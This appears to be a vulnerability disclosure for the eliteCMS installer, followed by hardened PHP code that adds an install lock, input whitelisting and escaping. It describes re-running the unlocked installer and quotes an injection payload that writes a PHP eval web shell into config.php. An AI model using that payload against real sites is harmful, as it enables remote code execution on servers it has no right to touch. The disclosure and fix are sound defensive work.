eliteCMS: installer not locked after installation + one-line backdoor write vulnerability

Posted on 2012-11-18 13:59:27
After installation finishes, the eliteCMS installer is not locked, so an attacker can re-run the installation simply by requesting the installer's URL.

The second vulnerability is that the installer can write a one-line backdoor directly into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    // ...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken from the request without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor will be written into /admin/includes/config.php.
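Both problems in the post come down to the same two missing controls: an install lock that stops the installer from running again, and proper encoding of user-supplied values before they are pasted into generated PHP source. The following is an added example, not eliteCMS's own code, of how the step-4 config writer could be hardened. The lock-file name (install.lock), the relative paths and the helper function names are assumptions made for the illustration; the request field names match those in the post.

```php
<?php
// Added example (not eliteCMS code): a hardened replacement for the installer's
// step-4 config writer. The install.lock file name and the paths are assumed.
declare(strict_types=1);

const INSTALL_LOCK = __DIR__ . '/install.lock';                   // hypothetical lock file
const CONFIG_FILE  = __DIR__ . '/../admin/includes/config.php';  // path from the post

// Refuse to run at all once installation has completed: fixes the "re-install" issue.
function assertNotInstalled(): void
{
    if (file_exists(INSTALL_LOCK)) {
        http_response_code(403);
        exit('Installation already completed; remove ' . basename(INSTALL_LOCK) . ' to reinstall.');
    }
}

// Whitelist validation: host/IP with optional :port, and MySQL-style identifiers.
function validateDbSettings(array $post): array
{
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-]{1,253}(:[0-9]{1,5})?$/',
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_.\-]{1,32}$/',
    ];
    $clean = [];
    foreach ($rules as $key => $re) {
        $value = $post[$key] ?? '';
        if (!is_string($value) || !preg_match($re, $value)) {
            throw new InvalidArgumentException("Invalid value for $key");
        }
        $clean[$key] = $value;
    }
    // A password may contain any character, but must be a string of sane length.
    $pass = $post['DB_PASS'] ?? '';
    if (!is_string($pass) || strlen($pass) > 256) {
        throw new InvalidArgumentException('Invalid value for DB_PASS');
    }
    $clean['DB_PASS'] = $pass;
    return $clean;
}

// Build the config.php source. var_export() emits a correctly quoted, escaped
// single-quoted PHP literal, so a value containing quotes or ?> cannot break
// out of the string and become code. No closing ?> tag is written either.
function buildConfigSource(array $settings): string
{
    $src = "<?php\n// Generated by the installer; do not edit by hand.\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $src .= sprintf("define('%s', %s);\n", $key, var_export($settings[$key], true));
    }
    return $src;
}

function writeConfig(array $post): void
{
    assertNotInstalled();
    $settings = validateDbSettings($post);
    $source   = buildConfigSource($settings);

    // Write atomically, then drop the lock so the installer cannot be re-run.
    $tmp = CONFIG_FILE . '.tmp';
    if (file_put_contents($tmp, $source, LOCK_EX) === false || !rename($tmp, CONFIG_FILE)) {
        throw new RuntimeException('Could not write config file');
    }
    file_put_contents(INSTALL_LOCK, date('c') . "\n", LOCK_EX);
}

// Demonstration on a constructed request shaped like the one in the post.
$attempt = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => '"?><?php eval($_POST[c]);?><?php',
    'DB_USER'   => 'elite',
    'DB_PASS'   => 's3cret',
];
try {
    validateDbSettings($attempt);          // rejected by the DB_NAME whitelist
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
// Even without the whitelist, the generated line stays an inert string literal.
echo buildConfigSource(['DB_SERVER' => 'localhost', 'DB_NAME' => '"?><?php x',
                        'DB_USER' => 'u', 'DB_PASS' => 'p']);
```

The two layers are deliberately independent: the whitelist rejects the payload outright, and var_export() guarantees that whatever does reach the file is emitted as data rather than code, so a gap in one rule does not turn into arbitrary PHP in config.php. The lock file is checked before any request data is read, which also closes the repeat-installation path.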